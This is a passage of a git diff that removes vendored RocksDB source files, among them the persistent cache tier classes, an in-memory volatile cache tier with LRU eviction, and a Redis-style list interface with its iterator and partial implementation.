-  virtual PersistentCache::StatsType Stats();
-
-  // Insert to page cache
-  virtual Status Insert(const Slice& page_key, const char* data,
-                        const size_t size) = 0;
-
-  // Lookup page cache by page identifier
-  virtual Status Lookup(const Slice& page_key, std::unique_ptr<char[]>* data,
-                        size_t* size) = 0;
-
-  // Does it store compressed data ?
-  virtual bool IsCompressed() = 0;
-
-  virtual std::string GetPrintableOptions() const = 0;
-
-  // Return a reference to next tier
-  virtual Tier& next_tier() { return next_tier_; }
-
-  // Set the value for next tier
-  virtual void set_next_tier(const Tier& tier) {
-    assert(!next_tier_);
-    next_tier_ = tier;
-  }
-
-  virtual void TEST_Flush() {
-    if (next_tier_) {
-      next_tier_->TEST_Flush();
-    }
-  }
-
- private:
-  Tier next_tier_;  // next tier
-};
-
-// PersistentTieredCache
-//
-// Abstraction that helps you construct a tiers of persistent caches as a
-// unified cache. The tier(s) of cache will act a single tier for management
-// ease and support PersistentCache methods for accessing data.
-class PersistentTieredCache : public PersistentCacheTier {
- public:
-  virtual ~PersistentTieredCache();
-
-  Status Open() override;
-  Status Close() override;
-  bool Erase(const Slice& key) override;
-  std::string PrintStats() override;
-  PersistentCache::StatsType Stats() override;
-  Status Insert(const Slice& page_key, const char* data,
-                const size_t size) override;
-  Status Lookup(const Slice& page_key, std::unique_ptr<char[]>* data,
-                size_t* size) override;
-  bool IsCompressed() override;
-
-  std::string GetPrintableOptions() const override {
-    return "PersistentTieredCache";
-  }
-
-  void AddTier(const Tier& tier);
-
-  Tier& next_tier() override {
-    auto it = tiers_.end();
-    return (*it)->next_tier();
-  }
-
-  void set_next_tier(const Tier& tier) override {
-    auto it = tiers_.end();
-    (*it)->set_next_tier(tier);
-  }
-
-  void TEST_Flush() override {
-    assert(!tiers_.empty());
-    tiers_.front()->TEST_Flush();
-    PersistentCacheTier::TEST_Flush();
-  }
-
- protected:
-  std::list<Tier> tiers_;  // list of tiers top-down
-};
-
-}  // namespace rocksdb
-
-#endif
diff --git a/thirdparty/rocksdb/utilities/persistent_cache/persistent_cache_util.h b/thirdparty/rocksdb/utilities/persistent_cache/persistent_cache_util.h
deleted file mode 100644
index 214bb58..0000000
--- a/thirdparty/rocksdb/utilities/persistent_cache/persistent_cache_util.h
+++ /dev/null
@@ -1,67 +0,0 @@
-//  Copyright (c) 2013, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
-#include <limits>
-#include <list>
-
-#include "util/mutexlock.h"
-
-namespace rocksdb {
-
-//
-// Simple synchronized queue implementation with the option of
-// bounding the queue
-//
-// On overflow, the elements will be discarded
-//
-template <class T>
-class BoundedQueue {
- public:
-  explicit BoundedQueue(
-      const size_t max_size = std::numeric_limits<size_t>::max())
-      : cond_empty_(&lock_), max_size_(max_size) {}
-
-  virtual ~BoundedQueue() {}
-
-  void Push(T&& t) {
-    MutexLock _(&lock_);
-    if (max_size_ != std::numeric_limits<size_t>::max() &&
-        size_ + t.Size() >= max_size_) {
-      // overflow
-      return;
-    }
-
-    size_ += t.Size();
-    q_.push_back(std::move(t));
-    cond_empty_.SignalAll();
-  }
-
-  T Pop() {
-    MutexLock _(&lock_);
-    while (q_.empty()) {
-      cond_empty_.Wait();
-    }
-
-    T t = std::move(q_.front());
-    size_ -= t.Size();
-    q_.pop_front();
-    return std::move(t);
-  }
-
-  size_t Size() const {
-    MutexLock _(&lock_);
-    return size_;
-  }
-
- private:
-  mutable port::Mutex lock_;
-  port::CondVar cond_empty_;
-  std::list<T> q_;
-  size_t size_ = 0;
-  const size_t max_size_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/utilities/persistent_cache/volatile_tier_impl.cc b/thirdparty/rocksdb/utilities/persistent_cache/volatile_tier_impl.cc
deleted file mode 100644
index d190a21..0000000
--- a/thirdparty/rocksdb/utilities/persistent_cache/volatile_tier_impl.cc
+++ /dev/null
@@ -1,138 +0,0 @@
-//  Copyright (c) 2013, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#ifndef ROCKSDB_LITE
-
-#include "utilities/persistent_cache/volatile_tier_impl.h"
-
-#include <string>
-
-namespace rocksdb {
-
-void VolatileCacheTier::DeleteCacheData(VolatileCacheTier::CacheData* data) {
-  assert(data);
-  delete data;
-}
-
-VolatileCacheTier::~VolatileCacheTier() { index_.Clear(&DeleteCacheData); }
-
-PersistentCache::StatsType VolatileCacheTier::Stats() {
-  std::map<std::string, double> stat;
-  stat.insert({"persistent_cache.volatile_cache.hits",
-               static_cast<double>(stats_.cache_hits_)});
-  stat.insert({"persistent_cache.volatile_cache.misses",
-               static_cast<double>(stats_.cache_misses_)});
-  stat.insert({"persistent_cache.volatile_cache.inserts",
-               static_cast<double>(stats_.cache_inserts_)});
-  stat.insert({"persistent_cache.volatile_cache.evicts",
-               static_cast<double>(stats_.cache_evicts_)});
-  stat.insert({"persistent_cache.volatile_cache.hit_pct",
-               static_cast<double>(stats_.CacheHitPct())});
-  stat.insert({"persistent_cache.volatile_cache.miss_pct",
-               static_cast<double>(stats_.CacheMissPct())});
-
-  auto out = PersistentCacheTier::Stats();
-  out.push_back(stat);
-  return out;
-}
-
-Status VolatileCacheTier::Insert(const Slice& page_key, const char* data,
-                                 const size_t size) {
-  // precondition
-  assert(data);
-  assert(size);
-
-  // increment the size
-  size_ += size;
-
-  // check if we have overshot the limit, if so evict some space
-  while (size_ > max_size_) {
-    if (!Evict()) {
-      // unable to evict data, we give up so we don't spike read
-      // latency
-      assert(size_ >= size);
-      size_ -= size;
-      return Status::TryAgain("Unable to evict any data");
-    }
-  }
-
-  assert(size_ >= size);
-
-  // insert order: LRU, followed by index
-  std::string key(page_key.data(), page_key.size());
-  std::string value(data, size);
-  std::unique_ptr<CacheData> cache_data(
-      new CacheData(std::move(key), std::move(value)));
-  bool ok = index_.Insert(cache_data.get());
-  if (!ok) {
-    // decrement the size that we incremented ahead of time
-    assert(size_ >= size);
-    size_ -= size;
-    // failed to insert to cache, block already in cache
-    return Status::TryAgain("key already exists in volatile cache");
-  }
-
-  cache_data.release();
-  stats_.cache_inserts_++;
-  return Status::OK();
-}
-
-Status VolatileCacheTier::Lookup(const Slice& page_key,
-                                 std::unique_ptr<char[]>* result,
-                                 size_t* size) {
-  CacheData key(std::move(page_key.ToString()));
-  CacheData* kv;
-  bool ok = index_.Find(&key, &kv);
-  if (ok) {
-    // set return data
-    result->reset(new char[kv->value.size()]);
-    memcpy(result->get(), kv->value.c_str(), kv->value.size());
-    *size = kv->value.size();
-    // drop the reference on cache data
-    kv->refs_--;
-    // update stats
-    stats_.cache_hits_++;
-    return Status::OK();
-  }
-
-  stats_.cache_misses_++;
-
-  if (next_tier()) {
-    return next_tier()->Lookup(page_key, result, size);
-  }
-
-  return Status::NotFound("key not found in volatile cache");
-}
-
-bool VolatileCacheTier::Erase(const Slice& key) {
-  assert(!"not supported");
-  return true;
-}
-
-bool VolatileCacheTier::Evict() {
-  CacheData* edata = index_.Evict();
-  if (!edata) {
-    // not able to evict any object
-    return false;
-  }
-
-  stats_.cache_evicts_++;
-
-  // push the evicted object to the next level
-  if (next_tier()) {
-    next_tier()->Insert(Slice(edata->key), edata->value.c_str(),
-                        edata->value.size());
-  }
-
-  // adjust size and destroy data
-  size_ -= edata->value.size();
-  delete edata;
-
-  return true;
-}
-
-}  // namespace rocksdb
-
-#endif
diff --git a/thirdparty/rocksdb/utilities/persistent_cache/volatile_tier_impl.h b/thirdparty/rocksdb/utilities/persistent_cache/volatile_tier_impl.h
deleted file mode 100644
index dba500c..0000000
--- a/thirdparty/rocksdb/utilities/persistent_cache/volatile_tier_impl.h
+++ /dev/null
@@ -1,142 +0,0 @@
-//  Copyright (c) 2013, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <atomic>
-#include <limits>
-#include <sstream>
-#include <string>
-#include <vector>
-
-#include "rocksdb/cache.h"
-#include "utilities/persistent_cache/hash_table.h"
-#include "utilities/persistent_cache/hash_table_evictable.h"
-#include "utilities/persistent_cache/persistent_cache_tier.h"
-
-// VolatileCacheTier
-//
-// This file provides persistent cache tier implementation for caching
-// key/values in RAM.
-//
-//        key/values
-//           |
-//           V
-// +-------------------+
-// | VolatileCacheTier | Store in an evictable hash table
-// +-------------------+
-//           |
-//           V
-//       on eviction
-//   pushed to next tier
-//
-// The implementation is designed to be concurrent. The evictable hash table
-// implementation is not concurrent at this point though.
-//
-// The eviction algorithm is LRU
-namespace rocksdb {
-
-class VolatileCacheTier : public PersistentCacheTier {
- public:
-  explicit VolatileCacheTier(
-      const bool is_compressed = true,
-      const size_t max_size = std::numeric_limits<size_t>::max())
-      : is_compressed_(is_compressed), max_size_(max_size) {}
-
-  virtual ~VolatileCacheTier();
-
-  // insert to cache
-  Status Insert(const Slice& page_key, const char* data,
-                const size_t size) override;
-  // lookup key in cache
-  Status Lookup(const Slice& page_key, std::unique_ptr<char[]>* data,
-                size_t* size) override;
-
-  // is compressed cache ?
-  bool IsCompressed() override { return is_compressed_; }
-
-  // erase key from cache
-  bool Erase(const Slice& key) override;
-
-  std::string GetPrintableOptions() const override {
-    return "VolatileCacheTier";
-  }
-
-  // Expose stats as map
-  PersistentCache::StatsType Stats() override;
-
- private:
-  //
-  // Cache data abstraction
-  //
-  struct CacheData : LRUElement<CacheData> {
-    explicit CacheData(CacheData&& rhs) ROCKSDB_NOEXCEPT
-        : key(std::move(rhs.key)),
-          value(std::move(rhs.value)) {}
-
-    explicit CacheData(const std::string& _key, const std::string& _value = "")
-        : key(_key), value(_value) {}
-
-    virtual ~CacheData() {}
-
-    const std::string key;
-    const std::string value;
-  };
-
-  static void DeleteCacheData(CacheData* data);
-
-  //
-  // Index and LRU definition
-  //
-  struct CacheDataHash {
-    uint64_t operator()(const CacheData* obj) const {
-      assert(obj);
-      return std::hash<std::string>()(obj->key);
-    }
-  };
-
-  struct CacheDataEqual {
-    bool operator()(const CacheData* lhs, const CacheData* rhs) const {
-      assert(lhs);
-      assert(rhs);
-      return lhs->key == rhs->key;
-    }
-  };
-
-  struct Statistics {
-    std::atomic<uint64_t> cache_misses_{0};
-    std::atomic<uint64_t> cache_hits_{0};
-    std::atomic<uint64_t> cache_inserts_{0};
-    std::atomic<uint64_t> cache_evicts_{0};
-
-    double CacheHitPct() const {
-      auto lookups = cache_hits_ + cache_misses_;
-      return lookups ? 100 * cache_hits_ / static_cast<double>(lookups) : 0.0;
-    }
-
-    double CacheMissPct() const {
-      auto lookups = cache_hits_ + cache_misses_;
-      return lookups ? 100 * cache_misses_ / static_cast<double>(lookups) : 0.0;
-    }
-  };
-
-  typedef EvictableHashTable<CacheData, CacheDataHash, CacheDataEqual>
-      IndexType;
-
-  // Evict LRU tail
-  bool Evict();
-
-  const bool is_compressed_ = true;    // does it store compressed data
-  IndexType index_;                    // in-memory cache
-  std::atomic<uint64_t> max_size_{0};  // Maximum size of the cache
-  std::atomic<uint64_t> size_{0};      // Size of the cache
-  Statistics stats_;
-};
-
-}  // namespace rocksdb
-
-#endif
diff --git a/thirdparty/rocksdb/utilities/redis/README b/thirdparty/rocksdb/utilities/redis/README
deleted file mode 100644
index 8b17bc0..0000000
--- a/thirdparty/rocksdb/utilities/redis/README
+++ /dev/null
@@ -1,14 +0,0 @@
-This folder defines a REDIS-style interface for Rocksdb.
-Right now it is written as a simple tag-on in the rocksdb::RedisLists class.
-It implements Redis Lists, and supports only the "non-blocking operations".
-
-Internally, the set of lists are stored in a rocksdb database, mapping keys to
-values. Each "value" is the list itself, storing a sequence of "elements".
-Each element is stored as a 32-bit-integer, followed by a sequence of bytes.
-The 32-bit-integer represents the length of the element (that is, the number
-of bytes that follow). And then that many bytes follow.
-
-
-NOTE: This README file may be old. See the actual redis_lists.cc file for
-definitive details on the implementation. There should be a header at the top
-of that file, explaining a bit of the implementation details.
diff --git a/thirdparty/rocksdb/utilities/redis/redis_list_exception.h b/thirdparty/rocksdb/utilities/redis/redis_list_exception.h
deleted file mode 100644
index f93bcbb..0000000
--- a/thirdparty/rocksdb/utilities/redis/redis_list_exception.h
+++ /dev/null
@@ -1,22 +0,0 @@
-/**
- * A simple structure for exceptions in RedisLists.
- *
- * @author Deon Nicholas (dnicholas@fb.com)
- * Copyright 2013 Facebook
- */
-
-#ifndef ROCKSDB_LITE
-#pragma once
-#include <exception>
-
-namespace rocksdb {
-
-class RedisListException: public std::exception {
- public:
-  const char* what() const throw() override {
-    return "Invalid operation or corrupt data in Redis List.";
-  }
-};
-
-} // namespace rocksdb
-#endif
diff --git a/thirdparty/rocksdb/utilities/redis/redis_list_iterator.h b/thirdparty/rocksdb/utilities/redis/redis_list_iterator.h
deleted file mode 100644
index 73907dd..0000000
--- a/thirdparty/rocksdb/utilities/redis/redis_list_iterator.h
+++ /dev/null
@@ -1,309 +0,0 @@
-// Copyright 2013 Facebook
-/**
- * RedisListIterator:
- * An abstraction over the "list" concept (e.g.: for redis lists).
- * Provides functionality to read, traverse, edit, and write these lists.
- *
- * Upon construction, the RedisListIterator is given a block of list data.
- * Internally, it stores a pointer to the data and a pointer to current item.
- * It also stores a "result" list that will be mutated over time.
- *
- * Traversal and mutation are done by "forward iteration".
- * The Push() and Skip() methods will advance the iterator to the next item.
- * However, Push() will also "write the current item to the result".
- * Skip() will simply move to next item, causing current item to be dropped.
- *
- * Upon completion, the result (accessible by WriteResult()) will be saved.
- * All "skipped" items will be gone; all "pushed" items will remain.
- *
- * @throws Any of the operations may throw a RedisListException if an invalid
- *          operation is performed or if the data is found to be corrupt.
- *
- * @notes By default, if WriteResult() is called part-way through iteration,
- *        it will automatically advance the iterator to the end, and Keep()
- *        all items that haven't been traversed yet. This may be subject
- *        to review.
- *
- * @notes Can access the "current" item via GetCurrent(), and other
- *        list-specific information such as Length().
- *
- * @notes The internal representation is due to change at any time. Presently,
- *        the list is represented as follows:
- *          - 32-bit integer header: the number of items in the list
- *          - For each item:
- *              - 32-bit int (n): the number of bytes representing this item
- *              - n bytes of data: the actual data.
- *
- * @author Deon Nicholas (dnicholas@fb.com)
- */
-
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include <string>
-
-#include "redis_list_exception.h"
-#include "rocksdb/slice.h"
-#include "util/coding.h"
-
-namespace rocksdb {
-
-/// An abstraction over the "list" concept.
-/// All operations may throw a RedisListException
-class RedisListIterator {
- public:
-  /// Construct a redis-list-iterator based on data.
-  /// If the data is non-empty, it must formatted according to @notes above.
-  ///
-  /// If the data is valid, we can assume the following invariant(s):
-  ///  a) length_, num_bytes_ are set correctly.
-  ///  b) cur_byte_ always refers to the start of the current element,
-  ///       just before the bytes that specify element length.
-  ///  c) cur_elem_ is always the index of the current element.
-  ///  d) cur_elem_length_ is always the number of bytes in current element,
-  ///       excluding the 4-byte header itself.
-  ///  e) result_ will always contain data_[0..cur_byte_) and a header
-  ///  f) Whenever corrupt data is encountered or an invalid operation is
-  ///      attempted, a RedisListException will immediately be thrown.
-  explicit RedisListIterator(const std::string& list_data)
-      : data_(list_data.data()),
-        num_bytes_(static_cast<uint32_t>(list_data.size())),
-        cur_byte_(0),
-        cur_elem_(0),
-        cur_elem_length_(0),
-        length_(0),
-        result_() {
-    // Initialize the result_ (reserve enough space for header)
-    InitializeResult();
-
-    // Parse the data only if it is not empty.
-    if (num_bytes_ == 0) {
-      return;
-    }
-
-    // If non-empty, but less than 4 bytes, data must be corrupt
-    if (num_bytes_ < sizeof(length_)) {
-      ThrowError("Corrupt header.");    // Will break control flow
-    }
-
-    // Good. The first bytes specify the number of elements
-    length_ = DecodeFixed32(data_);
-    cur_byte_ = sizeof(length_);
-
-    // If we have at least one element, point to that element.
-    // Also, read the first integer of the element (specifying the size),
-    //   if possible.
-    if (length_ > 0) {
-      if (cur_byte_ + sizeof(cur_elem_length_) <= num_bytes_) {
-        cur_elem_length_ = DecodeFixed32(data_+cur_byte_);
-      } else {
-        ThrowError("Corrupt data for first element.");
-      }
-    }
-
-    // At this point, we are fully set-up.
-    // The invariants described in the header should now be true.
-  }
-
-  /// Reserve some space for the result_.
-  /// Equivalent to result_.reserve(bytes).
-  void Reserve(int bytes) {
-    result_.reserve(bytes);
-  }
-
-  /// Go to next element in data file.
-  /// Also writes the current element to result_.
-  RedisListIterator& Push() {
-    WriteCurrentElement();
-    MoveNext();
-    return *this;
-  }
-
-  /// Go to next element in data file.
-  /// Drops/skips the current element. It will not be written to result_.
-  RedisListIterator& Skip() {
-    MoveNext();
-    --length_;          // One less item
-    --cur_elem_;        // We moved one forward, but index did not change
-    return *this;
-  }
-
-  /// Insert elem into the result_ (just BEFORE the current element / byte)
-  /// Note: if Done() (i.e.: iterator points to end), this will append elem.
-  void InsertElement(const Slice& elem) {
-    // Ensure we are in a valid state
-    CheckErrors();
-
-    const int kOrigSize = static_cast<int>(result_.size());
-    result_.resize(kOrigSize + SizeOf(elem));
-    EncodeFixed32(result_.data() + kOrigSize,
-                  static_cast<uint32_t>(elem.size()));
-    memcpy(result_.data() + kOrigSize + sizeof(uint32_t), elem.data(),
-           elem.size());
-    ++length_;
-    ++cur_elem_;
-  }
-
-  /// Access the current element, and save the result into *curElem
-  void GetCurrent(Slice* curElem) {
-    // Ensure we are in a valid state
-    CheckErrors();
-
-    // Ensure that we are not past the last element.
-    if (Done()) {
-      ThrowError("Invalid dereferencing.");
-    }
-
-    // Dereference the element
-    *curElem = Slice(data_+cur_byte_+sizeof(cur_elem_length_),
-                     cur_elem_length_);
-  }
-
-  // Number of elements
-  int Length() const {
-    return length_;
-  }
-
-  // Number of bytes in the final representation (i.e: WriteResult().size())
-  int Size() const {
-    // result_ holds the currently written data
-    // data_[cur_byte..num_bytes-1] is the remainder of the data
-    return static_cast<int>(result_.size() + (num_bytes_ - cur_byte_));
-  }
-
-  // Reached the end?
-  bool Done() const {
-    return cur_byte_ >= num_bytes_ || cur_elem_ >= length_;
-  }
-
-  /// Returns a string representing the final, edited, data.
-  /// Assumes that all bytes of data_ in the range [0,cur_byte_) have been read
-  ///  and that result_ contains this data.
-  /// The rest of the data must still be written.
-  /// So, this method ADVANCES THE ITERATOR TO THE END before writing.
-  Slice WriteResult() {
-    CheckErrors();
-
-    // The header should currently be filled with dummy data (0's)
-    // Correctly update the header.
-    // Note, this is safe since result_ is a vector (guaranteed contiguous)
-    EncodeFixed32(&result_[0],length_);
-
-    // Append the remainder of the data to the result.
-    result_.insert(result_.end(),data_+cur_byte_, data_ +num_bytes_);
-
-    // Seek to end of file
-    cur_byte_ = num_bytes_;
-    cur_elem_ = length_;
-    cur_elem_length_ = 0;
-
-    // Return the result
-    return Slice(result_.data(),result_.size());
-  }
-
- public: // Static public functions
-
-  /// An upper-bound on the amount of bytes needed to store this element.
-  /// This is used to hide representation information from the client.
-  /// E.G. This can be used to compute the bytes we want to Reserve().
-  static uint32_t SizeOf(const Slice& elem) {
-    // [Integer Length . Data]
-    return static_cast<uint32_t>(sizeof(uint32_t) + elem.size());
-  }
-
- private: // Private functions
-
-  /// Initializes the result_ string.
-  /// It will fill the first few bytes with 0's so that there is
-  ///  enough space for header information when we need to write later.
-  /// Currently, "header information" means: the length (number of elements)
-  /// Assumes that result_ is empty to begin with
-  void InitializeResult() {
-    assert(result_.empty());            // Should always be true.
-    result_.resize(sizeof(uint32_t),0); // Put a block of 0's as the header
-  }
-
-  /// Go to the next element (used in Push() and Skip())
-  void MoveNext() {
-    CheckErrors();
-
-    // Check to make sure we are not already in a finished state
-    if (Done()) {
-      ThrowError("Attempting to iterate past end of list.");
-    }
-
-    // Move forward one element.
-    cur_byte_ += sizeof(cur_elem_length_) + cur_elem_length_;
-    ++cur_elem_;
-
-    // If we are at the end, finish
-    if (Done()) {
-      cur_elem_length_ = 0;
-      return;
-    }
-
-    // Otherwise, we should be able to read the new element's length
-    if (cur_byte_ + sizeof(cur_elem_length_) > num_bytes_) {
-      ThrowError("Corrupt element data.");
-    }
-
-    // Set the new element's length
-    cur_elem_length_ = DecodeFixed32(data_+cur_byte_);
-
-    return;
-  }
-
-  /// Append the current element (pointed to by cur_byte_) to result_
-  /// Assumes result_ has already been reserved appropriately.
-  void WriteCurrentElement() {
-    // First verify that the iterator is still valid.
-    CheckErrors();
-    if (Done()) {
-      ThrowError("Attempting to write invalid element.");
-    }
-
-    // Append the cur element.
-    result_.insert(result_.end(),
-                   data_+cur_byte_,
-                   data_+cur_byte_+ sizeof(uint32_t) + cur_elem_length_);
-  }
-
-  /// Will ThrowError() if necessary.
-  /// Checks for common/ubiquitous errors that can arise after most operations.
-  /// This method should be called before any reading operation.
-  /// If this function succeeds, then we are guaranteed to be in a valid state.
-  /// Other member functions should check for errors and ThrowError() also
-  ///  if an error occurs that is specific to it even while in a valid state.
-  void CheckErrors() {
-    // Check if any crazy thing has happened recently
-    if ((cur_elem_ > length_) ||                              // Bad index
-        (cur_byte_ > num_bytes_) ||                           // No more bytes
-        (cur_byte_ + cur_elem_length_ > num_bytes_) ||        // Item too large
-        (cur_byte_ == num_bytes_ && cur_elem_ != length_) ||  // Too many items
-        (cur_elem_ == length_ && cur_byte_ != num_bytes_)) {  // Too many bytes
-      ThrowError("Corrupt data.");
-    }
-  }
-
-  /// Will throw an exception based on the passed-in message.
-  /// This function is guaranteed to STOP THE CONTROL-FLOW.
-  /// (i.e.: you do not have to call "return" after calling ThrowError)
-  void ThrowError(const char* const msg = NULL) {
-    // TODO: For now we ignore the msg parameter. This can be expanded later.
-    throw RedisListException();
-  }
-
- private:
-  const char* const data_;      // A pointer to the data (the first byte)
-  const uint32_t num_bytes_;    // The number of bytes in this list
-
-  uint32_t cur_byte_;           // The current byte being read
-  uint32_t cur_elem_;           // The current element being read
-  uint32_t cur_elem_length_;    // The number of bytes in current element
-
-  uint32_t length_;             // The number of elements in this list
-  std::vector<char> result_;    // The output data
-};
-
-} // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/redis/redis_lists.cc b/thirdparty/rocksdb/utilities/redis/redis_lists.cc
deleted file mode 100644
index 2b38a2d..0000000
--- a/thirdparty/rocksdb/utilities/redis/redis_lists.cc
+++ /dev/null
@@ -1,552 +0,0 @@
-// Copyright 2013 Facebook
-/**
- * A (persistent) Redis API built using the rocksdb backend.
- * Implements Redis Lists as described on: http://redis.io/commands#list
- *
- * @throws All functions may throw a RedisListException on error/corruption.
- *
- * @notes Internally, the set of lists is stored in a rocksdb database,
- *        mapping keys to values. Each "value" is the list itself, storing
- *        some kind of internal representation of the data. All the
- *        representation details are handled by the RedisListIterator class.
- *        The present file should be oblivious to the representation details,
- *        handling only the client (Redis) API, and the calls to rocksdb.
- *
- * @TODO  Presently, all operations take at least O(NV) time where
- *        N is the number of elements in the list, and V is the average
- *        number of bytes per value in the list. So maybe, with merge operator
- *        we can improve this to an optimal O(V) amortized time, since we
- *        wouldn't have to read and re-write the entire list.
- *
- * @author Deon Nicholas (dnicholas@fb.com)
- */
-
-#ifndef ROCKSDB_LITE
-#include "redis_lists.h"
-
-#include <iostream>
-#include <memory>
-#include <cmath>
-
-#include "rocksdb/slice.h"
-#include "util/coding.h"
-
-namespace rocksdb
-{
-
-/// Constructors
-
-RedisLists::RedisLists(const std::string& db_path,
-                       Options options, bool destructive)
-    : put_option_(),
-      get_option_() {
-
-  // Store the name of the database
-  db_name_ = db_path;
-
-  // If destructive, destroy the DB before re-opening it.
-  if (destructive) {
-    DestroyDB(db_name_, Options());
-  }
-
-  // Now open and deal with the db
-  DB* db;
-  Status s = DB::Open(options, db_name_, &db);
-  if (!s.ok()) {
-    std::cerr << "ERROR " << s.ToString() << std::endl;
-    assert(false);
-  }
-
-  db_ = std::unique_ptr<DB>(db);
-}
-
-
-/// Accessors
-
-// Number of elements in the list associated with key
-//   : throws RedisListException
-int RedisLists::Length(const std::string& key) {
-  // Extract the string data representing the list.
-  std::string data;
-  db_->Get(get_option_, key, &data);
-
-  // Return the length
-  RedisListIterator it(data);
-  return it.Length();
-}
-
-// Get the element at the specified index in the (list: key)
-// Returns <empty> ("") on out-of-bounds
-//   : throws RedisListException
-bool RedisLists::Index(const std::string& key, int32_t index,
-                       std::string* result) {
-  // Extract the string data representing the list.
-  std::string data;
-  db_->Get(get_option_, key, &data);
-
-  // Handle REDIS negative indices (from the end); fast iff Length() takes O(1)
-  if (index < 0) {
-    index = Length(key) - (-index);  //replace (-i) with (N-i).
-  }
-
-  // Iterate through the list until the desired index is found.
-  int curIndex = 0;
-  RedisListIterator it(data);
-  while(curIndex < index && !it.Done()) {
-    ++curIndex;
-    it.Skip();
-  }
-
-  // If we actually found the index
-  if (curIndex == index && !it.Done()) {
-    Slice elem;
-    it.GetCurrent(&elem);
-    if (result != NULL) {
-      *result = elem.ToString();
-    }
-
-    return true;
-  } else {
-    return false;
-  }
-}
-
-// Return a truncated version of the list.
-// First, negative values for first/last are interpreted as "end of list".
-// So, if first == -1, then it is re-set to index: (Length(key) - 1)
-// Then, return exactly those indices i such that first <= i <= last.
-//   : throws RedisListException
-std::vector<std::string> RedisLists::Range(const std::string& key,
-                                           int32_t first, int32_t last) {
-  // Extract the string data representing the list.
-  std::string data;
-  db_->Get(get_option_, key, &data);
-
-  // Handle negative bounds (-1 means last element, etc.)
-  int listLen = Length(key);
-  if (first < 0) {
-    first = listLen - (-first);           // Replace (-x) with (N-x)
-  }
-  if (last < 0) {
-    last = listLen - (-last);
-  }
-
-  // Verify bounds (and truncate the range so that it is valid)
-  first = std::max(first, 0);
-  last = std::min(last, listLen-1);
-  int len = std::max(last-first+1, 0);
-
-  // Initialize the resulting list
-  std::vector<std::string> result(len);
-
-  // Traverse the list and update the vector
-  int curIdx = 0;
-  Slice elem;
-  for (RedisListIterator it(data); !it.Done() && curIdx<=last; it.Skip()) {
-    if (first <= curIdx && curIdx <= last) {
-      it.GetCurrent(&elem);
-      result[curIdx-first].assign(elem.data(),elem.size());
-    }
-
-    ++curIdx;
-  }
-
-  // Return the result. Might be empty
-  return result;
-}
-
-// Print the (list: key) out to stdout. For debugging mostly. Public for now.
-void RedisLists::Print(const std::string& key) {
-  // Extract the string data representing the list.
-  std::string data;
-  db_->Get(get_option_, key, &data);
-
-  // Iterate through the list and print the items
-  Slice elem;
-  for (RedisListIterator it(data); !it.Done(); it.Skip()) {
-    it.GetCurrent(&elem);
-    std::cout << "ITEM " << elem.ToString() << std::endl;
-  }
-
-  //Now print the byte data
-  RedisListIterator it(data);
-  std::cout << "==Printing data==" << std::endl;
-  std::cout << data.size() << std::endl;
-  std::cout << it.Size() << " " << it.Length() << std::endl;
-  Slice result = it.WriteResult();
-  std::cout << result.data() << std::endl;
-  if (true) {
-    std::cout << "size: " << result.size() << std::endl;
-    const char* val = result.data();
-    for(int i=0; i<(int)result.size(); ++i) {
-      std::cout << (int)val[i] << " " << (val[i]>=32?val[i]:' ') << std::endl;
-    }
-    std::cout << std::endl;
-  }
-}
-
-/// Insert/Update Functions
-/// Note: The "real" insert function is private. See below.
-
-// InsertBefore and InsertAfter are simply wrappers around the Insert function.
-int RedisLists::InsertBefore(const std::string& key, const std::string& pivot,
-                             const std::string& value) {
-  return Insert(key, pivot, value, false);
-}
-
-int RedisLists::InsertAfter(const std::string& key, const std::string& pivot,
-                            const std::string& value) {
-  return Insert(key, pivot, value, true);
-}
-
-// Prepend value onto beginning of (list: key)
-//   : throws RedisListException
-int RedisLists::PushLeft(const std::string& key, const std::string& value) {
-  // Get the original list data
-  std::string data;
-  db_->Get(get_option_, key, &data);
-
-  // Construct the result
-  RedisListIterator it(data);
-  it.Reserve(it.Size() + it.SizeOf(value));
-  it.InsertElement(value);
-
-  // Push the data back to the db and return the length
-  db_->Put(put_option_, key, it.WriteResult());
-  return it.Length();
-}
-
-// Append value onto end of (list: key)
-// TODO: Make this O(1) time. Might require MergeOperator.
-//   : throws RedisListException
-int RedisLists::PushRight(const std::string& key, const std::string& value) {
-  // Get the original list data
-  std::string data;
-  db_->Get(get_option_, key, &data);
-
-  // Create an iterator to the data and seek to the end.
-  RedisListIterator it(data);
-  it.Reserve(it.Size() + it.SizeOf(value));
-  while (!it.Done()) {
-    it.Push();    // Write each element as we go
-  }
-
-  // Insert the new element at the current position (the end)
-  it.InsertElement(value);
-
-  // Push it back to the db, and return length
-  db_->Put(put_option_, key, it.WriteResult());
-  return it.Length();
-}
-
-// Set (list: key)[idx] = val. Return true on success, false on fail.
-//   : throws RedisListException
-bool RedisLists::Set(const std::string& key, int32_t index,
-                     const std::string& value) {
-  // Get the original list data
-  std::string data;
-  db_->Get(get_option_, key, &data);
-
-  // Handle negative index for REDIS (meaning -index from end of list)
-  if (index < 0) {
-    index = Length(key) - (-index);
-  }
-
-  // Iterate through the list until we find the element we want
-  int curIndex = 0;
-  RedisListIterator it(data);
-  it.Reserve(it.Size() + it.SizeOf(value));  // Over-estimate is fine
-  while(curIndex < index && !it.Done()) {
-    it.Push();
-    ++curIndex;
-  }
-
-  // If not found, return false (this occurs when index was invalid)
-  if (it.Done() || curIndex != index) {
-    return false;
-  }
-
-  // Write the new element value, and drop the previous element value
-  it.InsertElement(value);
-  it.Skip();
-
-  // Write the data to the database
-  // Check status, since it needs to return true/false guarantee
-  Status s = db_->Put(put_option_, key, it.WriteResult());
-
-  // Success
-  return s.ok();
-}
-
-/// Delete / Remove / Pop functions
-
-// Trim (list: key) so that it will only contain the indices from start..stop
